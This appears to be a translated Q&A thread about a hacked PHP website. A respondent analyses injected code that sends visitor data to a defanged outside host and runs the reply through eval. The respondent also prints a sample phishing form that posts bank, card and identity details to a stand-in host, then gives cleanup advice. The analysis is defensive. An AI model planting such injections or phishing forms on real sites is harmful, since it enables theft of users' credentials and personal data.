我的网站已被黑客攻陷,并且通过该网站查看每个PHP文件顶部还有大量其他内容.
现在每个文件都以:
GLOBAL $wehaveitagain;
if($wehaveitagain != 1)
{
数据库似乎很好,所以我很好奇,能够编辑我的文件的可能路径是什么?
Inc*_*ito 18
该漏洞利用基于POST请求,prgetxr其中设置了变量.
如果没有设置(并且可能,在网站的正常使用中,它将不会)它循环通过该IP哈希映射mynetsxx并且如果它发现请求的IP在网络中与此匹配(到了解"网络",你必须了解网络是如何工作的,但这些基本上都是本地人,而不是远程),如果是,它就会调用rewrioutclbkxxx.您可以通过发送GET变量showmeallpls为true 的GET请求来手动请求该函数调用.
rewrioutclbkxxx 是通过输出缓冲区启动传递的,因此它可能会在发送之前将所有数据搞砸,但是在正常代码执行完之后.
请注意,除非您知道自己在做什么,否则可能不会出现恶意域名.
它将从hxxp://airschk.com/clk(我已经审查了该URL中的HTTP)中获取数据,它想要获取一堆数据,因此它发送一个包含以下内容的字符串:user-agent(即用户的浏览器),它们的IP地址,他们要求的URL,他们来自哪个页面,以及4dae82ac67843a194c000ca1他们为识别您的服务器而设置的ID代码.
简而言之,代码将一大堆用户信息发送给airschk,并返回一些数据.这些数据被扔进了EVAL.热潮,你的网站是pwn'd.
EVAL将评估那里的任何字符串,就好像它是php一样.他们可以删除所有内容,编辑所有内容,更改他们想要的内容,甚至可以获取shell访问权 你基本上是pwnt.
现在等一下,如果我们确实发送那个POST请求的话呢?哦鬼鬼祟祟,他们已经去了一个URL toolbarqueries.google.com,但URL试图提升URL的谷歌页面排名(Blackhat SEO,你可以从谷歌这个被禁止,但在短期内他们得到更多的点击).
airschk.prgetxr和GET请求showmeallpls.由于他们可以按需编辑文件的输出流并了解用户代理和IP地址,因此他们可能会跟踪您的用户.让我们说你是一家银行,这是你的登录HTML:
<form method="post" action="./login.php">
<input name="BankAccountNumber" />
<input name="Password" />
</form>
好的,输出缓冲区重写实际上可以完全按照它的方式保存所有内容并对用户执行此操作:
<p>We have noticed high activity on your account, please provide additional information to help secure your account.</p>
<form method="post" action="http://example.com/hax/lulz">
<input name="CreditCardNumber" />
<input name="SocialSecurityNumber" />
<input name="FullName" />
<input name="DateOfBirth" />
<input name="HomeAddress" />
<input name="BankAccountNumber" />
<input name="Password" />
<input name="prgetxr" />
</form>
好吧,我会说你的整个服务器再也不会被信任了.从轨道上取出该死的东西并重新安装备份.
没有备份?你这人怎么回事?在您雇用某人梳理系统中安装的每行代码,每个数据库记录和最后一个文件之后,请备份到位,因为可以在任何地方使用更多漏洞.把这该死的东西搞定并安装一个备份.
接下来,设置chmod设置,以便除非是Web帐户的帐户以外的任何人都无法编辑这些文件.您需要了解unix安全性.
接下来,从服务器上运行的任何文件中删除该死的eval(甚至可能配置suhosin).如果你有任何依赖它的运行代码,那你无论如何都会做错.去掉它.你需要.
一个创可贴措施将阻止黑客域名,但这在12个小时内完全没有价值,他们可以移动到其他地方,并且可能已经到了现在.
我无法分辨他们为此做出的攻击路径,所以这是一个完全不同的调查,而不是真正的问题.
安全性并非易事,也不容易或快速学习.不要玩游戏,付钱给知道自己在做什么的人.
| 归档时间: |
|
| 查看次数: |
5569 次 |
| 最近记录: |